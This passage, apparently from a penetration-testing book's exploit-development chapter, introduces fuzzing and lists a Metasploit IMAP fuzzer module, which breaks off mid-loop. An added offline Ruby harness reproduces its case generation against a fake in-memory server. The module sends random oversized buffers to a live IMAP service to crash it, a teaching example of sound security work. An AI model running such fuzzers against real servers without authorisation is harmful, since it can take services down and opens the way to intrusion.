Chapter 14
NOTE
This chapter assumes that you are familiar with exploit development and comfortable with the concept of buffer overflows and the use of a debugger. If you need a bit of a refresher, you’ll find some excellent tutorials by corelanc0d3r on the Exploit Database site, http://www.exploit-db.com/. At a minimum, consider reading “Exploit Writing Tutorial Part 1: Stack Based Overflows” (http://www.exploit-db.com/download_pdf/13535/) and “Exploit Writing Tutorial Part 3: SEH” (http://www.exploit-db.com/download_pdf/13537/).
The Art of Fuzzing
Before you develop any exploit, you need to determine whether a vulnerability exists in the application. This is where fuzzing comes into play.

The following listing shows the code for a simple Internet Message Access Protocol (IMAP) fuzzer. Save this to your /root/.msf3/modules/auxiliary/fuzzers/ directory, but be sure to keep your testing modules in a folder separate from the main Metasploit trunk.
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Imap
  include Msf::Auxiliary::Dos

  def initialize
    super(
      'Name'        => 'Simple IMAP Fuzzer',
      'Description' => %q{
        An example of how to build a simple IMAP fuzzer.
        Account IMAP credentials are required in this
        fuzzer.},
      'Author'      => [ 'ryujin' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 1 $'
    )
  end

  # Random alphanumeric buffer of random length (0..1023 bytes)
  def fuzz_str()
    return Rex::Text.rand_text_alphanumeric(rand(1024))
  end

  def run()
    srand(0)  # fixed seed so the sequence of buffers can be replayed
    while (true)
      connected = connect_login()
      if not connected
        # the server stopped accepting logins after the previous buffer
        print_status("Host is not responding - this is G00D ;)")
        break
      end
      print_status("Generating fuzzed data...")
      fuzzed = fuzz_str()
      print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
      req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"
      print_status(req)
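The module's case generation and crash-detection loop, reproduced as an added example that is not the book's module: the Rex helper is replaced by plain Ruby driven by a seeded PRNG, and the IMAP server is a constructed in-memory stand-in, so the point of srand(0), replaying the exact buffer that made the server stop answering, can be checked offline.

```ruby
# Added example (not the book's module): stand-alone harness reproducing the
# fuzzer's generation loop without Metasploit. The PRNG is seeded so that a
# crash seen on iteration N can be replayed with the same buffer.

ALNUM = [*'A'..'Z', *'a'..'z', *'0'..'9'].freeze

# Random alphanumeric string of random length < 1024, mirroring
# Rex::Text.rand_text_alphanumeric(rand(1024)) in the module.
def fuzz_str(rng)
  Array.new(rng.rand(1024)) { ALNUM[rng.rand(ALNUM.size)] }.join
end

# Same IMAP LIST request shape the module builds.
def build_request(fuzzed)
  "0002 LIST () \"/#{fuzzed}\" \"PWNED\"\r\n"
end

# Deterministic case list: same seed => same sequence of buffers, which is
# what makes srand(0) in the module useful when a crash must be replayed.
def fuzz_cases(seed, count)
  rng = Random.new(seed)
  Array.new(count) { build_request(fuzz_str(rng)) }
end

# Constructed stand-in for the target: answers each request until one longer
# than `limit` arrives, then returns nil for good (models a server that stops
# responding after an overflow). Not a real IMAP implementation.
class FakeImapServer
  attr_reader :alive
  def initialize(limit)
    @limit = limit
    @alive = true
  end
  def handle(req)
    return nil unless @alive
    @alive = false if req.length > @limit
    @alive ? "0002 OK LIST completed\r\n" : nil
  end
end

# Send cases in order, stop at the first unanswered request, and report the
# iteration and buffer length needed to reproduce it.
def run_fuzzer(server, cases)
  cases.each_with_index do |req, i|
    return { iteration: i, length: req.length, crashed: true } if server.handle(req).nil?
  end
  { iteration: cases.size, length: nil, crashed: false }
end
```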